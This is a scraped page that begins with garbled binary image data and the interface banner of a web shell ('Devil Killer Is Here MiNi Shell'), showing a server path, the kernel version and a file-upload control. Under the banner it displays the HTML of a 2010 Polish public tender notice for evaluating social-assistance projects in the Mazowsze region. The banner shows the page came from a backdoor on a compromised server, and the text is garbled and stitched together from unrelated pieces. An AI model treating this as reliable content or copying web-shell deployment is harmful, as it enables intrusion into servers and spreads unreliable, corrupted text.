JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100827/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100827/232435-N-2010.html

<p class="kh_header"><b>Warszawa: Opracowanie i przeprowadzenie ewaluacji projektów systemowych OPS i PCPR  realizowanych w ramach Działania 7.1 Programu Operacyjnego Kapitał Ludzki, w oparciu założenia do ewaluacji projektów systemowych Ośrodków Pomocy Społecznej i Powiatowych Centrów Pomocy Rodzinie z terenu województwa mazowieckiego,  realizowanych przed 2010 rokiem w ramach Działania 7.1 Programu Operacyjnego Kapitał Ludzki Ministerstwa Rozwoju Regionalnego oraz opracowanie i przeprowadzenie ewaluacji projektu systemowego PO KL realizowanego przez MCPS.</b><br>
<b>Numer ogłoszenia: 232435 - 2010; data zamieszczenia: 27.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Mazowieckie Centrum Polityki Społecznej , ul. Nowogrodzka 62A, 02-002 Warszawa, woj. mazowieckie, tel. 022 6224232, faks 022 6224732.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mcps.mazovia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie i przeprowadzenie ewaluacji projektów systemowych OPS i PCPR  realizowanych w ramach Działania 7.1 Programu Operacyjnego Kapitał Ludzki, w oparciu założenia do ewaluacji projektów systemowych Ośrodków Pomocy Społecznej i Powiatowych Centrów Pomocy Rodzinie z terenu województwa mazowieckiego,  realizowanych przed 2010 rokiem w ramach Działania 7.1 Programu Operacyjnego Kapitał Ludzki Ministerstwa Rozwoju Regionalnego oraz opracowanie i przeprowadzenie ewaluacji projektu systemowego PO KL realizowanego przez MCPS..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem pierwszej części zamówienia jest przeprowadzenie ewaluacji projektów systemowych OPS i PCPR realizowanych w ramach Działania 7.1 Programu Operacyjnego Kapitał Ludzki, w oparciu założenia do ewaluacji projektów systemowych Ośrodków Pomocy Społecznej i Powiatowych Centrów Pomocy Rodzinie z terenu województwa mazowieckiego, realizowanych przed 2010 rokiem w ramach Działania 7.1 Programu Operacyjnego Kapitał Ludzki Ministerstwa Rozwoju Regionalnego.

I.	Cel ewaluacji projektów systemowych

1.	Głównym celem ewaluacji projektów systemowych, realizowanych 
w Poddziałaniu 7.1.1 oraz 7.1.2 PO KL jest ocena jakości wsparcia przewidzianego w tych projektach systemowych oraz pozyskanie kompleksowej wiedzy na temat sposobu zarządzania i wdrażania przedmiotowych projektów. Wynikiem przeprowadzonej ewaluacji powinny być trafne i użyteczne rekomendacje, służące poprawie jakości przygotowywanych projektów systemowych oraz bardziej skutecznemu i efektywnemu ich wdrażaniu w kolejnych latach programowania. 

2.	Cele szczegółowe ewaluacji to: 

1)	ocena jakości wykorzystanych w projektach systemowych narzędzi, instrumentów oraz zastosowanych form pomocy społecznej pod kątem ich trafności, skuteczności i efektywności, w efekcie której zaproponowane zostaną rozwiązania o charakterze systemowym, które będzie można powszechnie uznać jako rozwiązania modelowe i stosować w przyszłości;
2)	ocena potencjału beneficjentów oraz jakości zarządzania w projektach systemowych, w tym zasobów beneficjentów systemowych, służących skutecznej i efektywnej realizacji projektów oraz stopnia przygotowania do realizacji projektów systemowych;
3)	identyfikacja barier i problemów: 
	związanych z wdrażaniem projektów systemowych, realizowanych w ramach Poddziałania 7.1.1 oraz Poddziałania 7.1.2 PO KL;
	powodujących nieprzystępowanie niektórych OPS/PCPR do realizacji projektów systemowych; 
	powodujących, że niektóre OPS/PCPR zrezygnowały z realizacji projektów systemowych; 
4)	identyfikacja potrzeb beneficjentów systemowych Poddziałania 7.1.1 oraz Poddziałania 7.1.2 PO KL, związanych z realizacją projektów systemowych;
5)	ocena stopnia efektywności i jakości współpracy beneficjentów systemowych 
z instytucjami zaangażowanymi w realizację PO KL, innymi instytucjami lokalnymi oraz partnerami (w przypadku realizacji projektów w partnerstwie).  


II.   Kryteria ewaluacyjne
 
Kryteria ewaluacyjne, które powinny zostać zastosowane w ramach badania to:

1.	Trafność - rozumiana jako ocena sposobu doboru zastosowanych w projektach systemowych narzędzi, instrumentów oraz form pomocy społecznej pod kątem realizacji  celów interwencji EFS w ramach PO KL (celów projektów systemowych, celu Działania 7.1, celu szczegółowego nr 1 Priorytetu VII, celu szczegółowego nr 2 PO KL), a także zapisów lokalnych strategii rozwiązywania problemów społecznych 
2.	Skuteczność - rozumiana jako stopień, w jakim wdrażane w projektach działania poprzez wykorzystane narzędzia, instrumenty oraz formy pomocy społecznej przyczyniają się do realizacji celów projektów systemowych OPS PCPR oraz Działania 7.1, celu szczegółowego nr 1 Priorytetu VII, celu szczegółowego nr 2 PO KL 
3.	Efektywność - rozumiana jako stosunek uzyskanych efektów (osiągniętych celów, rezultatów projektów systemowych) do poniesionych nakładów finansowych, rzeczowych, kadrowych, czasowych, a także fakt dysponowania przez beneficjentów systemowych odpowiednimi zasobami niezbędnymi do sprawnej realizacji projektów
4.	Spójność - rozumiana jako stopień komplementarności (uzupełniania się) oraz kompleksowości (wszechstronności) narzędzi, instrumentów oraz form pomocy społecznej zastosowanych w projektach systemowych z Poddziałania 7.1.1 oraz 7.1.2 PO KL
III.   Pytania ewaluacyjne

Raport z badania musi przedstawiać odpowiedzi na następujące pytania:

1.	W jakim stopniu stosowane w projektach narzędzia, instrumenty i formy pomocy społecznej są właściwie dobrane i przyczyniają się do realizacji celów projektów systemowych oraz celu całego Działania 7.1 PO KL? Czy projekty są zgodne z lokalnymi strategiami rozwiązywania problemów społecznych (zgodnie z art. 17 ust. 1 pkt 1 oraz art. 19 pkt 1 ustawy z dnia 12 marca 2004 r. o pomocy społecznej)? 
2.	Które narzędzia, instrumenty i formy pomocy społecznej, zastosowane w projektach systemowych są najbardziej skuteczne (najlepiej przyczyniają się do realizacji celów i osiągnięcia rezultatów projektów systemowych OPS/PCPR oraz celu całego Działania 7.1 PO KL, jak również celu szczegółowego nr 1 Priorytetu VII PO KL oraz celu szczegółowego nr 2 PO KL)? 
3.	W jakim stopniu narzędzia i instrumenty, stosowane w ramach projektów systemowych są zróżnicowane, komplementarne względem siebie (uzupełniają się) oraz kompleksowe (działają wszechstronnie i wyczerpująco)? 
4.	Czy projekty systemowe w Poddziałaniu 7.1.1 oraz Poddziałaniu 7.1.2 PO KL są skutecznie zarządzane (czy budżet jest wydatkowany w założonym wymiarze, a zadania realizowane zgodnie z harmonogramem, określonym we wniosku o dofinansowanie projektu?; czy wartości docelowe wskaźników w ramach Działania 7.1, określone dla województwa w danym roku obowiązywania Planu Działania są przez beneficjentów systemowych osiągane?; czy przepływ informacji pomiędzy beneficjentami a uczestnikami jest 
wystarczający do skutecznej i sprawnej realizacji projektu?) 
5.	W jakim stopniu stosowane w projektach narzędzia, instrumenty i formy pomocy społecznej są efektywne (czy osiągnięte w projektach rezultaty można było zrealizować przy użyciu innych zasobów lub w krótszym okresie czasu)? 
6.	W jakim stopniu beneficjenci systemowi Poddziałania 7.1.1 oraz Poddziałania 7.1.2 PO KL są przygotowani do realizacji projektów systemowych (dysponują odpowiednim potencjałem finansowym, rzeczowym, kadrowym oraz czasowym, niezbędnym do sprawnej i efektywnej realizacji działań, określonych we wnioskach o dofinansowanie projektów systemowych)? 
7.	Czy w ramach rezerwy alokacji przeznaczonej na Działanie 7.1 PO KL w danym regionie  przewidziano środki na zatrudnienie w projektach systemowych OPS i PCPR dodatkowych pracowników socjalnych lub doradców ds. osób niepełnosprawnych? Jeśli tak, to w jakim stopniu zatrudnienie tych pracowników zwiększyło poziom skuteczności i efektywności realizowanych projektów? Jeżeli nie zatrudniono takich pracowników, to jakie były tego powody? 
8.	Dlaczego niektóre OPS/PCPR nie przystąpiły do projektów lub zrezygnowały z ich realizacji w kolejnym roku trwania projektu? Jakie są przyczyny podejmowania takich decyzji? 
9.	Jakich problemów doświadczają beneficjenci systemowi Poddziałania 7.1.1 oraz Poddziałania 7.1.2 w trakcie i w związku z realizacją projektów systemowych? Jakie działania podejmują w celu rozwiązania pojawiających się w trakcie realizacji projektu problemów? Z kim się kontaktują? Jakie metody i sposoby wykorzystują w celu rozwiązania tych problemów? Gdzie poszukują informacji na ten temat? Czy i od kogo uzyskują ewentualną pomoc w tym zakresie? 
10.	Jakie są potrzeby i oczekiwania beneficjentów systemowych Poddziałania 7.1.1 oraz Poddziałania 7.1.2 PO KL, związane ze wsparciem ze strony ROPS, realizowanym w ramach projektów systemowych z Poddziałania 7.1.3 PO KL ? 
11.	Jak beneficjenci systemowi Poddziałania 7.1.1 oraz Poddziałania 7.1.2 PO KL oceniają współpracę z innymi instytucjami lokalnymi (w tym przede wszystkim z publicznymi służbami zatrudnienia), organizacjami pozarządowymi, a także IP PO KL? 
12.	W jakim stopniu współpraca beneficjentów systemowych z partnerami jest skuteczna i efektywna? Jak beneficjenci systemowi oceniają jakość komunikacji pomiędzy liderem projektu a partnerami? Czy występują jakiekolwiek problemy we współpracy partnerskiej, a jeśli tak - to jakie? 
IV.   Minimum metodologiczne

d)	Analiza danych zastanych (desk research) - analizie poddane zostaną:
a.	wybrane przez MCPS (lub wykonawcę) wnioski o dofinansowanie projektów systemowych z Poddziałania 7.1.1 oraz Poddziałania 7.1.2 z 2009 r. dobór wniosków do analizy - losowy, wg następującego schematu:
i.	jeżeli liczba wniosków w regionie >150 to analiza powinna obejmować co najmniej 50% projektów systemowych, 
ii.	jeżeli liczba wniosków w regionie mieści się w przedziale 100-150, to analiza powinna obejmować co najmniej 60% zrealizowanych projektów systemowych,
iii.	jeżeli liczba wniosków w regionie <100, to analiza powinna obejmować co najmniej 70% projektów systemowych; 
b.	zapisy dokumentów programowych PO KL: 
i.	Programu Operacyjnego Kapitał Ludzki, 
ii.	Szczegółowego Opisu Priorytetów PO KL, 
iii.	Zasad przygotowania, realizacji oraz rozliczania projektów systemowych OPS, PCPR oraz ROPS
c.	lokalne (gminne/powiatowe) strategie rozwiązywania problemów społecznych (jeśli istnieją) w jednostkach samorządu terytorialnego, 
w których były realizowane projekty systemowe z Poddziałania 7.1.1 oraz Poddziałania 7.1.2 PO KL - liczba strategii dobrana analogicznie jak liczba wniosków o dofinansowanie;
d.	wyniki badań ewaluacyjnych IP/IP2 PO KL, dotyczących oceny wsparcia w zakresie integracji społecznej udzielanego ze środków finansowych PO KL (jeśli takie badania były w danym regionie przeprowadzone);
e)	Wywiady pogłębione (IDI) - prowadzone z koordynatorami projektów systemowych z Podziałania 7.1.1 i Poddziałania 7.1.2 PO KL - dobór respondentów do wywiadów w OPS/PCPR - losowy (co najmniej 5 wywiadów w każdym regionie); dyspozycje do wywiadu zawarte zostały w Załączniku 2.
f)	Ankieta internetowa (CAWI), skierowana do kierowników wszystkich OPS/PCPR w danym regionie - realizowana w 2010 r.; wzór ankiety do wykorzystania zawarty jest w Załączniku 1. 
g)	Studia przypadków (case studies) - dobrane celowo w każdym regionie; studia przypadków powinny polegać na szczegółowej analizie wniosku o dofinansowanie, dokumentacji projektowej oraz wizyt, uwzględniających obserwację w miejscu realizacji projektu; szczególnie istotna jest w tym przypadku możliwość wskazania i opisania tzw. dobrych praktyk, czyli przykładów inicjatyw i rozwiązań, które mogą być wskazane jako skuteczne formy przeciwdziałania wykluczeniu społecznemu. 
V. Obowiązki  Wykonawcy

1.	od Wykonawcy oczekuje się:
a)	współpracy z MCPS, polegającej na przygotowaniu narzędzi badawczych (wywiadu CAWI na podstawie zamieszczonego w założeniach wzoru kwestionariusza oraz szczegółowych pytań do wywiadów IDI na postawie dyspozycji z Załącznika 2.) oraz materiałów do badania;
b)	pozostawania w stałym kontakcie z MCPS (spotkania odpowiednio do potrzeb, kontakt telefoniczny, e-mail, wyznaczenie osoby do kontaktów roboczych);
c)	informowania o stanie prac, pojawiających się problemach i innych zagadnieniach istotnych dla realizacji badania; 
d)	przekazania MCPS wstępnej wersji raportu końcowego oraz ostatecznej wersji raportu końcowego, narzędzi badawczych oraz wszystkich baz danych.
2.	Obowiązkiem Wykonawcy jest zapewnienie respondentom pełnej anonimowości w celu uzyskania jak najbardziej wiarygodnych danych.
3.	Wszystkie materiały przygotowane w trakcie badania (m.in. kwestionariusze, raporty) powinny być opatrzone godłem UE oraz logo Programu Operacyjnego Kapitał Ludzki oraz informacją o współfinansowaniu badania ze środków UE, w formie zapisu: Badanie ewaluacyjne współfinansowane przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Użyte emblematy i sformułowania muszą być zgodne z zasadami wizualizacji PO KL.






VI. Struktura raportu końcowego

Raport końcowy nie powinien zawierać więcej niż 50 stron A4 (bez załączników) 
i powinien składać się z następujących elementów: 
	maksymalnie 2 strony A4 w formie podsumowania, w którym zebrane zostaną najistotniejsze wyniki i rekomendacje; 
	streszczenie w języku polskim (istotne wyniki wraz z rekomendacjami; objętość do 5 stron A4); streszczenie powinno być zawarte  w osobnym dokumencie;
	spis treści;
	wprowadzenie (opisu przedmiotu badania, celów badania);
	opis wyników badania (wraz z ich analizą i interpretacją);
	wnioski (podsumowanie badania z uwzględnieniem specyfiki badanego obszaru) i ponumerowane rekomendacje w formie tabelarycznej, zredagowane wg wzoru z Załącznika 3;
	aneksy, przedstawiające zestawienia danych oraz zastosowane narzędzia badawcze.

Opis przedmiotu drugiej części zamówienia na przeprowadzenie ewaluacji projektu systemowego Mazowieckiego Centrum Polityki Społecznej, realizowanego w ramach Działania 7.1 Programu Operacyjnego Kapitał Ludzki

Przedmiotem zamówienia jest przeprowadzenie Projektu systemowego POKL realizowanego w ramach Działania 7.1.3  przez MCPS .


Przedmiotem drugiej części zamówienia jest przeprowadzenie ewaluacji projektu systemowego realizowanego przez Mazowieckiego Centrum Polityki Społecznej. 

Głównym celem ewaluacji  jest ocena  jakości  działań realizowanych przez MCPS 
w projekcie oraz pozyskanie wiedzy na temat czynników mających wpływ na sposób udzielanego wsparcia  jednostkom pomocy społecznej realizującym działania aktywnej integracji.

Cele szczegółowe ewaluacji;

1.	Ocena jakości przeprowadzanych szkoleń pod względem doboru tematyki szkoleń, seminariów, konferencji , wizyt studyjnych w efekcie której będzie można  dokonać zmiany co do doboru tematyki szkoleń i pozostałych działań aby  osiągnąć jak najwyższą  jakość i przydatność szkoleń organizowanych
 w kolejnych latach.

2.	Ocena jakość  prowadzonych szkoleń  w odniesieniu do wykładowców informacje z tej części ewaluacji pozwolą na dobór najlepszych wykładowców w poszczególnej tematyce na kolejne lata, oraz na analizę ponoszonych kosztów w stosunku do jakości świadczonej usługi.

3.	Ocena jakości bazy szkoleniowej tj. miejsca doboru szkolenia, jakości zakwaterowania, w trakcie;  szkoleń, seminariów, konferencji , co pozwoli na określenie stopnia przydatności wybranej bazy  do potrzeb odbiorców w celu zapewnienia optymalnych warunków dla realizacji działań oraz analizę ponoszonych kosztów w stosunku do osiąganej jakości usług.

4.	Ocenę stopnia aktywności pracowników poszczególnych podmiotów jednostek pomocy  społecznej i organizacji realizujących aktywną integrację   uczestniczących  w szkoleniach seminariach i konferencjach. Dane uzyskane w wyniku badania pozwolą na przeprowadzenie analizy porównawczej pozwalającej na określenie efektywności prowadzonych działań szkoleniowych przez MCPS w zakresie realizacji projektów systemowych prowadzonych na terenie Mazowsza.


Kryteria ewaluacyjne

Trafność - rozumiana jako jakość doboru tematyki szkoleń, konferencji, seminariów do potrzeb uczestników.
Skuteczność - rozumiana jako stopień jakości  kadry wykładowców  oraz  jakości miejsca odbywania szkoleń  w stosunku do oceny ich ogólnej przydatności dla uczestników.
Efektywność - rozumiana jako stosunek liczby uczestników projektu do zakładanych rezultatów projektu.
Spójność - rozumiana jako stopień wykorzystania możliwości uczestnictwa w szkoleniach, seminariach, konferencjach na realizację przez poszczególne instytucje pomocy społecznej projektów systemowych. 

Pytania ewaluacyjne;

Raport musi przedstawić odpowiedzi na następujące pytania.
1.	Przedstawiciele, których instytucji i organizacji są najaktywniejszymi uczestnikami oferowanych działań?
2.	Które tematy szkoleń seminariów i konferencji są najbardziej cenione i w jaki stopniu?
3.	Którzy z  wykładowców  są najbardziej cenieni  przez odbiorców szkoleń, seminariów i konferencji.
4.	W jakich miejscach i w jakich warunkach powinny być organizowane najefektywniejsze szkolenia.
5.	Jaki wpływ ma uczestnictwo w szkoleniach  poszczególnych pracowników na zaangażowane  instytucji pomocy społecznej w realizację projektów systemowych.
Analiza danych zastanych;

Analizie poddane zostaną: 
a)	Analiza ankiet ewaluacyjnych uczestników działań projektu  za 2009 rok i w okresie styczeń-wrzesień 2010.
b)	Analiza dokumentów  w formie papierowej i elektronicznej pozostająca w dyspozycji MCPS.
Obowiązki wykonawcy;
Od wykonawcy oczekuje się;
a)	współpracy z Zamawiającym, polegającej na przygotowaniu narzędzi badawczych oraz materiałów do badania;
b)	pozostawania w stałym kontakcie z Zamawiającym (spotkania odpowiednio do potrzeb, kontakt telefoniczny, e-mail, wyznaczenie osoby do kontaktów roboczych);
c)	informowania o stanie prac, pojawiających się problemach i innych zagadnieniach istotnych dla realizacji badania;
d)	 przekazania Zamawiającemu wstępnej wersji raportu końcowego oraz ostatecznej wersji raportu końcowego (zgodnie z szczegółowym harmonogramem ustalonym przez MCPS), narzędzi badawczych oraz wszystkich baz danych.
Harmonogram realizacji zamówienia
a.	Przeprowadzenie badań ewaluacyjnych do 15.11.2010 r.
b.	Przeprowadzenie analizy danych z badań i sporządzenie wstępnej wersji raportu końcowego do dnia 30 .11.2010r.
c.	Przekazanie ostatecznej wersji raportu końcowego z badania ewaluacyjnego do 15.12.2010 r.
d.	Przekazanie skróconej wersji raportu przygotowanej do publikacji do 20.12.2010..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.31.50.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie przez Wykonawcę w ofercie dokumentów i oświadczeń wymienionych w pkt. 14 będzie stanowiło podstawę do oceny spełnienia warunków udziału w postępowaniu. Zamawiający oceni na podstawie treści tych dokumentów i oświadczeń czy Wykonawca spełnia wszystkie ww. warunki</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>(wykazują się wiedzą i doświadczeniem, związanym z problematyką pomocy i integracji społecznej, a także posiadają wiedzę z zakresu prowadzenia ewaluacji (zrealizować minimum dwa badania ewaluacyjne lub społeczne, bądź dwie analizy w obszarze pomocy i integracji społecznej łącznej o wartości co najmniej 20 000 zł brutto ); Złożenie przez Wykonawcę w ofercie dokumentów i oświadczeń wymienionych w pkt. 14 będzie stanowiło podstawę do oceny spełnienia warunków udziału w postępowaniu. Zamawiający oceni na podstawie treści tych dokumentów i oświadczeń czy Wykonawca spełnia wszystkie ww. warunki</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie przez Wykonawcę w ofercie dokumentów i oświadczeń wymienionych w pkt. 14 będzie stanowiło podstawę do oceny spełnienia warunków udziału w postępowaniu. Zamawiający oceni na podstawie treści tych dokumentów i oświadczeń czy Wykonawca spełnia wszystkie ww. warunki</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>13.1.4	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; (w tym osobą posiadającą doświadczenie w realizacji co najmniej jednego projektu związanego z problematyką pomocy i integracji społecznej o wartości co najmniej 10 000 zł brutto lub oraz dysponuje zespołem badawczym posiadającym doświadczenie w stosowaniu ilościowych i jakościowych technik badawczych oraz w prowadzeniu analiz statystycznych i interpretacji danych ilościowych oraz osobą posiadającymi co najmniej w jednej z dziedzin: polityka społeczna, socjologia, ekonomia, ekonometria, politologia.); Złożenie przez Wykonawcę w ofercie dokumentów i oświadczeń wymienionych w pkt. 14 będzie stanowiło podstawę do oceny spełnienia warunków udziału w postępowaniu. Zamawiający oceni na podstawie treści tych dokumentów i oświadczeń czy Wykonawca spełnia wszystkie ww. warunki</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie przez Wykonawcę w ofercie dokumentów i oświadczeń wymienionych w pkt. 14 będzie stanowiło podstawę do oceny spełnienia warunków udziału w postępowaniu. Zamawiający oceni na podstawie treści tych dokumentów i oświadczeń czy Wykonawca spełnia wszystkie ww. warunki</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

